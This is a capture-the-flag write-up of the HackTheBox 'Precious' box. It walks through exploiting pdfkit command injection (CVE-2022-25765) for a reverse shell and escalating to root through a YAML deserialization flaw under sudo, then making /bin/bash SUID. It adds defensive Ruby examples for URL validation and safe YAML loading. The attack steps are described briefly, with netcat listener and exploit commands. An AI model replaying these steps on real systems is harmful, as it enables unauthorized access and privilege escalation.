information gathering
Use nmap to discover open ports and services:
Now we focus on its http service on port 80.
Access it in the Firefox browser (remember to modify your /etc/hosts):
It seems that this website converts a web page to a PDF file. I tried aaa in the search bar:
I was reminded to provide a valid URL. Naturally I thought of starting an HTTP server on my Kali machine and then entering my server address:
As expected, a PDF was downloaded to my own machine. We can obviously find some familiar files by opening it.
At this point all I can access is a PDF, so I use exiftool to analyse it.
What catches my attention is pdfkit v0.8.6. I tried searchsploit reflexively but found nothing:
Then I turned to Google and found a command injection vulnerability:
After trying several PoCs, I found a Python exploit, nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765 [1]:
step 1: start a Python simple HTTP server:
step 2: start an nc listener:
step 3: python CVE-2022-25765.py -t target -a localhost -p localport:
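Seen from the defending side, the root cause in this class of bug is untrusted input reaching a shell. The example below is added here (it is not pdfkit's code nor its upstream fix, and the names validate_url!, safe_url? and UnsafeUrl are hypothetical); it shows the input validation a URL-to-PDF service should apply before a user-supplied URL goes anywhere near an external converter, including the percent-encoded variants of the characters the raw allowlist already excludes:

```ruby
require 'uri'

class UnsafeUrl < ArgumentError; end

# Characters accepted in a URL that will be handed to an external converter.
# Deliberately narrower than RFC 3986: shell-significant characters such as
# backtick, $, &, ;, |, quotes, parentheses and whitespace are not included.
ALLOWED_RAW = %r{\A[A-Za-z0-9\-._~:/?#@%=+,]+\z}

# Bytes that must never appear once percent-encoding is undone, so that
# %20, %60 and friends cannot smuggle them past ALLOWED_RAW.
SHELL_META = /[\s`$&|;<>(){}'"\\*!\x00-\x1f\x7f]/

# Returns the parsed URI when the string is acceptable, raises UnsafeUrl otherwise.
def validate_url!(raw)
  raise UnsafeUrl, "forbidden character" unless raw.match?(ALLOWED_RAW)
  # Every % must introduce exactly two hex digits; anything else is malformed.
  raise UnsafeUrl, "malformed percent-encoding" if raw.match?(/%(?![0-9A-Fa-f]{2})/)

  # Inspect each encoded byte without building a decoded string.
  raw.scan(/%[0-9A-Fa-f]{2}/).each do |enc|
    byte = enc[1, 2].hex
    raise UnsafeUrl, "encoded control, space or non-ASCII byte" unless (0x21..0x7e).cover?(byte)
    raise UnsafeUrl, "encoded shell metacharacter" if SHELL_META.match?(byte.chr)
  end

  uri = URI.parse(raw)
  raise UnsafeUrl, "only http/https allowed" unless uri.is_a?(URI::HTTP) # URI::HTTPS < URI::HTTP
  raise UnsafeUrl, "missing host" if uri.host.nil? || uri.host.empty?
  uri
rescue URI::InvalidURIError => e
  raise UnsafeUrl, e.message
end

# Boolean convenience wrapper around validate_url!.
def safe_url?(raw)
  validate_url!(raw)
  true
rescue UnsafeUrl
  false
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs, not traffic from the machine in the write-up.
  ["http://10.10.14.5:8000/index.html",
   "http://example.com/%20`id`",
   "http://example.com/%60id%60",
   "file:///etc/passwd"].each do |u|
    puts "#{u.ljust(40)} -> #{safe_url?(u) ? 'accepted' : 'rejected'}"
  end
end
```

Validation like this is defence in depth only; the primary fix is to never build a command string from user input at all, for example by passing the converter its arguments as an array (`system("wkhtmltopdf", url, out)` rather than a single interpolated string) so that no shell parses the URL.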
foothold
Now we have a shell after the exploit:
By following the steps below, I finally got a fully interactive shell:
1. open a bash terminal
2. nc -nlvp 4444
3. ctrl+z to background the job
4. stty -echo raw
5. fg
I found a secret directory in the home path after looking around:
su henry:
user.txt lies in /home/henry.
privilege escalation
The last step is privilege escalation.
At first, I tried the simplest but most effective way:
It appears that henry can run the file update_dependencies.rb as root. Use cat to take a look at the file:
I'm drawn to YAML.load; it appears to be vulnerable to a deserialization attack. Notice that the script loads a file named dependencies.yml. I downloaded a malicious yml from Google to verify the vulnerability:
sudo /usr/bin/ruby /opt/update_dependencies.rb:
It works!
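What makes YAML.load dangerous here, and how the script should have loaded the file instead, is easiest to see side by side. The following is an added example and not the code from /opt/update_dependencies.rb: the class DependencySpec and the two YAML documents are constructed stand-ins, chosen to be harmless, so that the difference between the permissive loader and YAML.safe_load can be observed without any real payload:

```ruby
require 'yaml'

# Hypothetical class standing in for whatever the script expects to find in
# dependencies.yml. The demo only needs *some* class that a YAML tag can name.
class DependencySpec
  attr_accessor :name, :version
end

# Constructed sample documents (not the file from the box). The first carries
# a Ruby-specific object tag, which is the hook a deserialization attack uses:
# a permissive loader will instantiate whatever class the tag names.
TAGGED_YAML = <<~YAML
  --- !ruby/object:DependencySpec
  name: pdfkit
  version: 0.8.6
YAML

PLAIN_YAML = <<~YAML
  ---
  name: pdfkit
  version: 0.8.6
YAML

# The behaviour the vulnerable script relies on: full object revival.
# Psych 4 (Ruby 3.1+) made YAML.load safe and moved the old behaviour to
# YAML.unsafe_load; older Psych only has YAML.load, so pick whichever applies.
def load_permissive(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Hardened loader: only the basic YAML types (Hash, Array, String, Integer,
# Float, true/false/nil) are ever instantiated; any !ruby/* tag is an error.
def load_hardened(doc)
  YAML.safe_load(doc)
end

# If the file legitimately needs a custom type, allowlist exactly that class
# instead of falling back to the permissive loader.
def load_allowlisted(doc)
  YAML.safe_load(doc, permitted_classes: [DependencySpec])
end

# true when the hardened loader refuses a document because of its tag.
def tag_rejected?(doc)
  load_hardened(doc)
  false
rescue Psych::DisallowedClass
  true
end

if __FILE__ == $PROGRAM_NAME
  obj = load_permissive(TAGGED_YAML)
  puts "permissive loader built: #{obj.class} (#{obj.name} #{obj.version})"
  puts "hardened loader rejects tagged doc: #{tag_rejected?(TAGGED_YAML)}"
  puts "hardened loader on plain doc: #{load_hardened(PLAIN_YAML).inspect}"
end
```

The permissive loader happily returns a DependencySpec it built from the tag; with a gadget class in place of DependencySpec that is exactly the primitive the attack uses. YAML.safe_load raises Psych::DisallowedClass on the same document, and still parses the plain mapping the script actually needs. When the file is fed to a script run via sudo, the loader choice is the whole difference between a config parser and a root shell.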
Try to add SUID to /bin/bash:
exploit:
/bin/bash -p:
References
[1]
nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 (github.com): https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765
Originally published on the WeChat official account (Crush Sec): htb_precious